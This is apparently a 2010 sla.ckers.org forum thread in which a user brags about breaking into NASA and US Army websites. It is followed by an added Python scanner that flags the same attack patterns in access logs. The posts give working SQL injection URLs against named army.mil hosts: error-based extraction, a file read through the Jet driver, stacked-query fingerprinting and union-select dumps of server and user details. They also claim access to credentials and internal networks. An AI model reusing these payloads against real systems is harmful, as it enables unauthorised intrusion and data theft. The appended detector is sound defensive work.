Sla.ckers.org
NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 13, 2010 12:12AM

Jaijeya
I have been exploring NASA for SQL injections and XSS since mid-January and, to my wonder, every 3 minutes I've discovered a new SQL injection vulnerability or XSS.
The SQL injection allowed me to access user credentials, the file system and internal networks, and precious information from their servers.

The database servers deployed by them span nearly all types of servers on different systems, like Sybase, Oracle, MySQL, SQL Server, MS Access, NoSQL, etc.

Some of the vulnerable NASA subdomains are: [hostname list omitted] and so many more.
More information is available in the following Orkut community:

http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5428640088652321772&na=4&nst=28&nid=25319870-5428640088652321772-5431980662675543020


and penetration pictures can be viewed at:
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&aid=1264214598


"vinnu"
LOX (Legion Of Xtremers), INDIA

Pentagone SQL Injection
Posted by: vinnu
Date: February 14, 2010 01:43PM

Check the following error-based injection:

https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: rvdh
Date: February 14, 2010 04:46PM

Yes, this has been the case for ages on their networks; apparently they simply gave up administrating tons of boxes all over the place. Somehow I can relate.

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 14, 2010 11:37PM

Yes, that's right.
I think now they should prepare a virus like in the Terminator movie to administer their huge networks automatically, one that can learn and identify the problems and fix them automatically.

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 15, 2010 12:46AM

This is an MS Jet database; check the file system access using SQL injection:

http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&pubNo=&date1=&date2=&pubDesc=

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: rvdh
Date: February 15, 2010 08:27AM

Yeah, most folks have enough trouble administrating 1 box (their own), let alone thousands of boxes. There is no way you can secure them all effectively. Imagine the horror of a patch schedule for all those boxes. It would imply they need at least 1 guy administrating 10 to 20 boxes or they lose track. That's a lot of guys, all working in different departments, with different skills and no web application skills whatsoever. So I'm guessing they made the trade-off with a security policy where sensitive data is in different, more tightly monitored clusters.

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 01:33AM

Yeah, that's right.
Somewhere I read that the Pentagon's cyber security budget is over $100 million.
This is a great amount.
Another thing is that we actually talk about home PCs being used as zombies to attack other networks; likewise, these systems can also be used for further attacks or exploration of their internal networks.
In some of the NASA cases the same was true: the compromised database allowed me to further enumerate the internal network.

Actually they are doing what is taught as the preliminary things to avoid when learning secure software development. I mean they are employing security at the perimeter in some places, like at the HTTP level, and not at the application level.
Like in some cases, you can grab information about internal systems or the server itself by causing something unexpected, like an error, and the applications throw huge heaps of information, enough for an attacker, whereas the HTTP filter doesn't stop such outward flow, so at those networks only the inward traffic is analysed.

Well, all in all, we are just curious people and can only attempt ourselves to find out where our taxes are actually being used up and how effectively.
There is no opposition (of the assembly, of course) to debate this or stop this useless spending.

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 11:31AM

A blind SQL injection in a Pentagon server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13
Stacked queries are also working; check the two cases below. If the query returns properly, it means the DB engine is Microsoft SQL Server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version
and now test this:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@veion
"vinnu"
LOX (Legion Of Xtremers), INDIA

Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 11:50AM

And now a perfect query:

http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13

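A defender-side example, added here and not part of the thread: a small access-log scanner that flags the payload shapes vinnu posts above (the error-based cast over sysobjects, the Jet [TEXT;DATABASE=...] file read, the stacked ";select @@version" fingerprint, the union select carrying server-info functions, and the "order by N" column probe). The log lines, IPs and timestamps are constructed; only the query-string shapes come from the posts.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access log lines (not from the thread); the query
# strings copy the payload shapes posted above, with the hosts left out.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Feb/2010:11:31:00 +0000] "GET /about/hours.cfm?recid=5order+by+13;select+@@version HTTP/1.1" 500 312
10.0.0.5 - - [16/Feb/2010:11:50:00 +0000] "GET /about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6 HTTP/1.1" 200 4120
10.0.0.7 - - [14/Feb/2010:13:43:00 +0000] "GET /acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int) HTTP/1.1" 500 890
10.0.0.9 - - [15/Feb/2010:00:46:00 +0000] "GET /publications/results.asp?topic=Forms'+union+select+1,File,Message+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]' HTTP/1.1" 200 7710
10.0.0.11 - - [15/Feb/2010:09:00:00 +0000] "GET /about/hours.cfm?recid=59 HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is matched against the URL-decoded, lower-cased query string.
RULES = [
    # cast((select ... from sysobjects ...) as int): extraction through a conversion error
    ("error_based_cast_sysobjects", re.compile(r"cast\s*\(.*\bsysobjects\b.*\)\s*as\s+int")),
    # [TEXT;DATABASE=...]: Jet text ISAM driver reading a file through the query
    ("jet_text_isam_file_read", re.compile(r"\[text;database=")),
    # ;select @@version / @@servername: stacked query used to fingerprint MSSQL
    ("stacked_query_fingerprint", re.compile(r";\s*select\s+@@(version|servername)")),
    # union select with server-info functions in the column list
    ("union_select_sysinfo", re.compile(
        r"union\s+(all\s+)?select\b.*(@@version|user_name\(|suser_name\(|@@servername)")),
    # "order by N" glued onto a numeric parameter: column-count probe
    ("order_by_probe", re.compile(r"order\s+by\s+\d+")),
]

def classify_query(query):
    """Return the names of every rule that fires on a raw query string."""
    decoded = unquote_plus(query).lower()
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Parse access-log lines and report the requests that hit any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        hits = classify_query(query)
        if hits:
            findings.append({"ip": m.group("ip"), "path": path,
                             "status": int(m.group("status")), "hits": hits})
    return findings
```

Run `scan_log(SAMPLE_LOG)` to see the four flagged requests; the clean `recid=59` request produces no finding, and a 500 status alongside a cast/sysobjects hit is the error-based pattern worth alerting on first.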